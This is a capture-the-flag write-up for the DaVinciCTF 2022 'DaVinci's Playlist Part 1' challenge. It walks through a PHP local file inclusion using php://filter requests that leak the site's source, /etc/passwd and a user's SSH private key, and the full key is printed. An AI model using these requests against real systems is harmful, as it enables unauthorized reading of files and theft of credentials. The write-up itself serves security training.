Davinci CTF 2022-Pentest Part 1
16 Mar 2022This past weekend, the DaVinciCode hosted a CTF titled “DaVinciCTF 2022” and it was a great fun to try and improve on all the challenges. You can check out on CTFTime as well as their site: https://dvc.tf/
Today, we’ll be looking at the “pentesting” challenge: DaVinci's Playlist : Part 1
https://dvc.tf/challenges#DaVinci’s%20Playlist%20:%20Part%201-37
The challenge site is still up, so feel free to follow along.
Enumeration
Helpfully, the site organizers let us know that we won’t need to bruteforce anything for this challenge.
After reading the challenge description, I visited the target site. I started up BurpSuite, so as to be sure to capture requests.
After watching a few music videos, I take a look at the application, I can see it’s passing data via 2 parameters:
MyTop5=
playlistTop=
So my first attempt is to try adding a single quote (‘) to the those parameters. Here’s one of my requests:
GET /?MyTop5=5&playlistTop=TopRapUS' HTTP/1.1
and there’s something interesting in the response source:
![(/images/CTF/davinci-2022/20220316125749.png)
From here, I tried a few other things, like trying to read the flag, but using a php filter was more useful, so I snagged the source, using the following payload.
GET /?MyTop5=1&playlistTop=php://filter/convert.base64-encode/resource=index.php
I get back the following wad of base64:
http://www.youtube.com/embed/PCFET0NUWVBFIGh0bWw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+TXkgVG9wIDU8L3RpdGxlPgogICAgPG1ldGEgY2hhcnNldD0idXRmLTgiPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1lZGdlIj4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MSI+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vcHJvLmZvbnRhd2Vzb21lLmNvbS9yZWxlYXNlcy92NS4xMi4wL2Nzcy9hbGwuY3NzIiBpbnRlZ3JpdHk9InNoYTM4NC1la09yeWFYUGJlQ3BXUU54TXdTV1Z2UTArMVZyU3RvUEpxNTRzaGxZaFI4SHpRZ2lnMXY1ZmFzNllnT3FMb0t6IiBjcm9zc29yaWdpbj0iYW5vbnltb3VzIj4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iYXNzZXRzL2Nzcy9ib290c3RyYXAubWluLmNzcyI+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9ImFzc2V0cy9jc3Mvc3R5bGUuY3NzIj4KPC9oZWFkPgoKCgoKPD9waHAKaWYgKGlzc2V0KCRfR0VUWydNeVRvcDUnXSkpIHsKICAgICR0b3AgPSAkX0dFVFsnTXlUb3A1J107Cn0gZWxzZSB7CiAgICAkdG9wID0gIjEiOwp9CgppZiAoaXNzZXQoJF9HRVRbJ3BsYXlsaXN0VG9wJ10pKSB7CiAgICAkcGxheWxpc3QgPSAkX0dFVFsncGxheWxpc3RUb3AnXTsKfSBlbHNlIHsKICAgICRwbGF5bGlzdCA9ICJUb3BSYXBVUyI7Cn0KCgppZiAoaXNzZXQoJHBsYXlsaXN0KSAmJiBpc3NldCgkdG9wKSkgewogICAgJGhhbmRsZSA9IGZvcGVuKCRwbGF5bGlzdCwgInIiKTsKICAgIGlmICgkaGFuZGxlKSB7CiAgICAgICAgJHRhZyA9ICIiOwogICAgICAgICRjb3VudGVyID0gMDsKICAgICAgICB3aGlsZSAoKCRsaW5lID0gZmdldHMoJGhhbmRsZSkpICE9PSBmYWxzZSkgewogICAgICAgICAgICBpZiAoJGNvdW50ZXIgKyAxID09ICR0b3ApIHsKICAgICAgICAgICAgICAgICR0YWcgPSAkbGluZTsKICAgICAgICAgICAgfQogICAgICAgICAgICAkY291bnRlcisrOwogICAgICAgIH0KICAgICAgICBmY2xvc2UoJGhhbmRsZSk7CiAgICB9Cn0KPz4KPGRpdiBjbGFzcz0icC00IHRleHQtY2VudGVyIGJnLWltYWdlIiA+CjxkaXYgY2xhc3M9ImNhcmQgbXgtYXV0byIgc3R5bGU9IndpZHRoOiA2MCU7IG1hcmdpbi10b3A6IDQlOyI+CiAgICA8ZGl2IGNsYXNzPSJ0ZXh0LWNlbnRlciI+CiAgICAgICAgPGJyPgoKICAgICAgICA8aDE+PGI+PHU+VG9wIFNvbmdzPC91PjwvYj48L2gxPgogICAgCiAgICAgICAgPGJyPgogICAgICAgIDxpZnJhbWUgc3JjPSJodHRwOi8vd3d3LnlvdXR1YmUuY29tL2VtYmVkLzw/cGhwIGVjaG8gJHRhZzsgPz4iIHdpZHRoPSI1NjAiIGhlaWdodD0iMzE1IiBmcmFtZWJvcmRlcj0iMCIgYWxsb3dmdWxsc2NyZWVuPjwvaWZyYW1lPgogICAKICAgICAgICA8YnI+CiAgICAgICAgPGJyPgoKICAgICAgICA8Ym9keT4KICAgICAgICAgICAgPGgyPjxiPlNvbmc8L2I+PC9oMj4KICAgICAgICAgICAgPGZvcm0gbWV0aG9kPSJnZXQiPgogICAgICAgICAgICAgICAgPGlucHV0IHR5cGU9InJhZGlvIiBpZD0idmlkZW8xIiBuYW1lPSJNeVRvcDUiIHZhbHVlPSIxIiA8P3BocCBpZiggIShpc3NldCgkX0dFVFsnTXlUb3A1J10pKSB8fCAoaXNzZXQoJF9HRVRbJ015VG9wNSddKSAmJiAkX0dFVFsnTXlUb3A1J10gPT0gJzEnKSkgZWNobyAnIGNoZWNrZWQ9ImNoZWNrZWQiJz8+PgogICAgICAgICAgICAgICAgPGxhYmVsIGZvcj0idmlkZW8xIj5Ub3AgMTwvbGFiZWw+CgogICAgICAgICAgICAgICAgPGlucHV0IHR5cGU9InJhZGlvIiBpZD0idmlkZW8yIiBuYW1lPSJNeVRvcDUiIHZhbHVlPSIyIiA8P3BocCBpZiggKGlzc2V0KCRfR0VUWydNeVRvcDUnXSkgJiYgJF9HRVRbJ015VG9wNSddID09ICcyJykpIGVjaG8gJyBjaGVja2VkPSJjaGVja2VkIic/Pj4KICAgICAgICAgICAgICAgIDxsYWJlbCBmb3I9InZpZGVvMiI+VG9wIDI8L2xhYmVsPgoKICAgICAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJyYWRpbyIgaWQ9InZpZGVvMyIgbmFtZT0iTXlUb3A1IiB2YWx1ZT0iMyIgPD9waHAgaWYoIChpc3NldCgkX0dFVFsnTXlUb3A1J10pICYmICRfR0VUWydNeVRvcDUnXSA9PSAnMycpKSBlY2hvICcgY2hlY2tlZD0iY2hlY2tlZCInPz4+CiAgICAgICAgICAgICAgICA8bGFiZWwgZm9yPSJ2aWRlbzMiPlRvcCAzPC9sYWJlbD4KCiAgICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0icmFkaW8iIGlkPSJ2aWRlbzQiIG5hbWU9Ik15VG9wNSIgdmFsdWU9IjQiIDw/cGhwIGlmKCAoaXNzZXQoJF9HRVRbJ015VG9wNSddKSAmJiAkX0dFVFsnTXlUb3A1J10gPT0gJzQnKSkgZWNobyAnIGNoZWNrZWQ9ImNoZWNrZWQiJz8+PgogICAgICAgICAgICAgICAgPGxhYmVsIGZvcj0idmlkZW80Ij5Ub3AgNDwvbGFiZWw+CgogICAgICAgICAgICAgICAgPGlucHV0IHR5cGU9InJhZGlvIiBpZD0idmlkZW81IiBuYW1lPSJNeVRvcDUiIHZhbHVlPSI1IiA8P3BocCBpZiggKGlzc2V0KCRfR0VUWydNeVRvcDUnXSkgJiYgJF9HRVRbJ015VG9wNSddID09ICc1JykpIGVjaG8gJyBjaGVja2VkPSJjaGVja2VkIic/Pj4KICAgICAgICAgICAgICAgIDxsYWJlbCBmb3I9InZpZGVvNSI+VG9wIDU8L2xhYmVsPgoKICAgICAgICAgICAgICAgIDxicj4KICAgICAgICAgICAgICAgIDxicj4KCiAgICAgICAgICAgICAgICA8aDI+PGI+UGxheWxpc3Q8L2I+PC9oMj4KCiAgICAgICAgICAgICAgICA8Zm9ybSBtZXRob2Q9InBvc3QiPgogICAgICAgICAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJyYWRpbyIgaWQ9IlRPUCIgbmFtZT0icGxheWxpc3RUb3AiIHZhbHVlPSJUb3BSYXBVUyIgPD9waHAgaWYoICEoaXNzZXQoJF9HRVRbJ3BsYXlsaXN0VG9wJ10pKSB8fCAoaXNzZXQoJF9HRVRbJ3BsYXlsaXN0VG9wJ10pICYmICRfR0VUWydwbGF5bGlzdFRvcCddID09ICdUb3BSYXBVUycpKSBlY2hvICcgY2hlY2tlZD0iY2hlY2tlZCInPz4+CiAgICAgICAgICAgICAgICAgICAgPGxhYmVsIGZvcj0idmlkZW8xIj5SYXAgVVM8L2xhYmVsPgoKICAgICAgICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0icmFkaW8iIGlkPSJUT1AiIG5hbWU9InBsYXlsaXN0VG9wIiB2YWx1ZT0iVG9wUmFwRnIiIDw/cGhwIGlmKChpc3NldCgkX0dFVFsncGxheWxpc3RUb3AnXSkgJiYgJF9HRVRbJ3BsYXlsaXN0VG9wJ10gPT0gJ1RvcFJhcEZyJykpIGVjaG8gJyBjaGVja2VkPSJjaGVja2VkIic/Pj4KICAgICAgICAgICAgICAgICAgICA8bGFiZWwgZm9yPSJ2aWRlbzIiPlJhcCBGUiA8L2xhYmVsPgogICAgICAgICAgICAgICAgICAgIDxicj4KICAgICAgICAgICAgICAgICAgICA8YnI+CiAgICAgICAgICAgICAgICAgICAgPGRpdj4KICAgICAgICAgICAgICAgICAgICAgICAgPGJ1dHRvbiBjbGFzcz0iYnRuIGJ0bi1kYXJrIiB0eXBlPSJzdWJtaXQiPlN1Ym1pdDwvYnV0dG9uPgogICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPC9mb3JtPgoKICAgICAgICAgICAgPC9mb3JtPgoKICAgICAgICA8L2JvZHk+CiAgICAgICAgPGJyPgogICAgPC9kaXY+CjwvZGl2Pgo8L2Rpdj4KPC9odG1sPgo=
and after a decode we get the following:
<!DOCTYPE html>
<html>
<head>
<title>My Top 5</title>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.12.0/css/all.css" integrity="sha384-ekOryaXPbeCpWQNxMwSWVvQ0+1VrStoPJq54shlYhR8HzQgig1v5fas6YgOqLoKz" crossorigin="anonymous">
<link rel="stylesheet" href="assets/css/bootstrap.min.css">
<link rel="stylesheet" href="assets/css/style.css">
</head>
<?php
if (isset($_GET['MyTop5'])) {
$top = $_GET['MyTop5'];
} else {
$top = "1";
}
if (isset($_GET['playlistTop'])) {
$playlist = $_GET['playlistTop'];
} else {
$playlist = "TopRapUS";
}
if (isset($playlist) && isset($top)) {
$handle = fopen($playlist, "r");
if ($handle) {
$tag = "";
$counter = 0;
while (($line = fgets($handle)) !== false) {
if ($counter + 1 == $top) {
$tag = $line;
}
$counter++;
}
fclose($handle);
}
}
?>
<div class="p-4 text-center bg-image" >
<div class="card mx-auto" style="width: 60%; margin-top: 4%;">
<div class="text-center">
<br>
<h1><b><u>Top Songs</u></b></h1>
<br>
<iframe src="http://www.youtube.com/embed/<?php echo $tag; ?>" width="560" height="315" frameborder="0" allowfullscreen></iframe>
<br>
<br>
<body>
<h2><b>Song</b></h2>
<form method="get">
<input type="radio" id="video1" name="MyTop5" value="1" <?php if( !(isset($_GET['MyTop5'])) || (isset($_GET['MyTop5']) && $_GET['MyTop5'] == '1')) echo ' checked="checked"'?>>
<label for="video1">Top 1</label>
<input type="radio" id="video2" name="MyTop5" value="2" <?php if( (isset($_GET['MyTop5']) && $_GET['MyTop5'] == '2')) echo ' checked="checked"'?>>
<label for="video2">Top 2</label>
<input type="radio" id="video3" name="MyTop5" value="3" <?php if( (isset($_GET['MyTop5']) && $_GET['MyTop5'] == '3')) echo ' checked="checked"'?>>
<label for="video3">Top 3</label>
<input type="radio" id="video4" name="MyTop5" value="4" <?php if( (isset($_GET['MyTop5']) && $_GET['MyTop5'] == '4')) echo ' checked="checked"'?>>
<label for="video4">Top 4</label>
<input type="radio" id="video5" name="MyTop5" value="5" <?php if( (isset($_GET['MyTop5']) && $_GET['MyTop5'] == '5')) echo ' checked="checked"'?>>
<label for="video5">Top 5</label>
<br>
<br>
<h2><b>Playlist</b></h2>
<form method="post">
<input type="radio" id="TOP" name="playlistTop" value="TopRapUS" <?php if( !(isset($_GET['playlistTop'])) || (isset($_GET['playlistTop']) && $_GET['playlistTop'] == 'TopRapUS')) echo ' checked="checked"'?>>
<label for="video1">Rap US</label>
<input type="radio" id="TOP" name="playlistTop" value="TopRapFr" <?php if((isset($_GET['playlistTop']) && $_GET['playlistTop'] == 'TopRapFr')) echo ' checked="checked"'?>>
<label for="video2">Rap FR </label>
<br>
<br>
<div>
<button class="btn btn-dark" type="submit">Submit</button>
</div>
</form>
</form>
</body>
<br>
</div>
</div>
</div>
</html>
Now, with source in hand we can see its an LFI challenge at first.
LFI Enumeration
The fopen() hints at the LFI earlier, so we can do something as simple as adding /etc/passwd to our GET request.
Request:
GET /?MyTop5=5&playlistTop=/etc/passwd HTTP/1.1
and we get back the following:
Now, we’ve confirmed we can read files, I’ll combine the 2 to get read encode the /etc/passwd file:
GET /?MyTop5=1&playlistTop=php://filter/convert.base64-encode/resource=/etc/passwd
Response:
cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4venNoCmRhZW1vbjp4OjE6MTpkYWVtb246L3Vzci9zYmluOi91c3Ivc2Jpbi9ub2xvZ2luCmJpbjp4OjI6MjpiaW46L2JpbjovdXNyL3NiaW4vbm9sb2dpbgpzeXM6eDozOjM6c3lzOi9kZXY6L3Vzci9zYmluL25vbG9naW4Kc3luYzp4OjQ6NjU1MzQ6c3luYzovYmluOi9iaW4vc3luYwpnYW1lczp4OjU6NjA6Z2FtZXM6L3Vzci9nYW1lczovdXNyL3NiaW4vbm9sb2dpbgptYW46eDo2OjEyOm1hbjovdmFyL2NhY2hlL21hbjovdXNyL3NiaW4vbm9sb2dpbgpscDp4Ojc6NzpscDovdmFyL3Nwb29sL2xwZDovdXNyL3NiaW4vbm9sb2dpbgptYWlsOng6ODo4Om1haWw6L3Zhci9tYWlsOi91c3Ivc2Jpbi9ub2xvZ2luCm5ld3M6eDo5Ojk6bmV3czovdmFyL3Nwb29sL25ld3M6L3Vzci9zYmluL25vbG9naW4KdXVjcDp4OjEwOjEwOnV1Y3A6L3Zhci9zcG9vbC91dWNwOi91c3Ivc2Jpbi9ub2xvZ2luCnByb3h5Ong6MTM6MTM6cHJveHk6L2JpbjovdXNyL3NiaW4vbm9sb2dpbgp3d3ctZGF0YTp4OjEwMDA6MzM6d3d3LWRhdGE6L3Zhci93d3c6L3Vzci9zYmluL25vbG9naW4KYmFja3VwOng6MzQ6MzQ6YmFja3VwOi92YXIvYmFja3VwczovdXNyL3NiaW4vbm9sb2dpbgpsaXN0Ong6Mzg6Mzg6TWFpbGluZyBMaXN0IE1hbmFnZXI6L3Zhci9saXN0Oi91c3Ivc2Jpbi9ub2xvZ2luCmlyYzp4OjM5OjM5OmlyY2Q6L3Zhci9ydW4vaXJjZDovdXNyL3NiaW4vbm9sb2dpbgpnbmF0czp4OjQxOjQxOkduYXRzIEJ1Zy1SZXBvcnRpbmcgU3lzdGVtIChhZG1pbik6L3Zhci9saWIvZ25hdHM6L3Vzci9zYmluL25vbG9naW4Kbm9ib2R5Ong6NjU1MzQ6NjU1MzQ6bm9ib2R5Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzeXN0ZW1kLXRpbWVzeW5jOng6MTAwOjEwMjpzeXN0ZW1kIFRpbWUgU3luY2hyb25pemF0aW9uLCwsOi9ydW4vc3lzdGVtZDovYmluL2ZhbHNlCnN5c3RlbWQtbmV0d29yazp4OjEwMToxMDM6c3lzdGVtZCBOZXR3b3JrIE1hbmFnZW1lbnQsLCw6L3J1bi9zeXN0ZW1kL25ldGlmOi9iaW4vZmFsc2UKc3lzdGVtZC1yZXNvbHZlOng6MTAyOjEwNDpzeXN0ZW1kIFJlc29sdmVyLCwsOi9ydW4vc3lzdGVtZC9yZXNvbHZlOi9iaW4vZmFsc2UKc3lzdGVtZC1idXMtcHJveHk6eDoxMDM6MTA1OnN5c3RlbWQgQnVzIFByb3h5LCwsOi9ydW4vc3lzdGVtZDovYmluL2ZhbHNlCl9hcHQ6eDoxMDQ6NjU1MzQ6Oi9ub25leGlzdGVudDovYmluL2ZhbHNlCm1lc3NhZ2VidXM6eDoxMDU6MTA5OjovdmFyL3J1bi9kYnVzOi9iaW4vZmFsc2UKc3NoZDp4OjEwNjo2NTUzNDo6L3Zhci9ydW4vc3NoZDovdXNyL3NiaW4vbm9sb2dpbgpsZW9uYXJkbzp4OjEwMDE6MTAwMTo6L2hvbWUvbGVvbmFyZG86L2Jpbi9iYXNoCmFkbWluaXN0cmF0b3I6eDoxMDAyOjEwMDI6Oi9ob21lL2FkbWluaXN0cmF0b3I6L2Jpbi9iYXNoCg==
You can use cyberchef or the terminal to decode the base64 and we get back our file:
root:x:0:0:root:/root:/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:1000:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
leonardo:x:1001:1001::/home/leonardo:/bin/bash
administrator:x:1002:1002::/home/administrator:/bin/bash
From here, we can see the user leonardo and the administrator user.
We have read access to leonardo’s ssh key via /home/leonardo/.ssh/id_rsa
GET /?MyTop5=1&playlistTop=php://filter/convert.base64-encode/resource=/home/leonardo/.ssh/id_rsa HTTP/1.1
After decoding we get the following:
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
and updating the permissions on the file we now have ssh access!
I’ll go over the 2nd part of the challenge in a later post.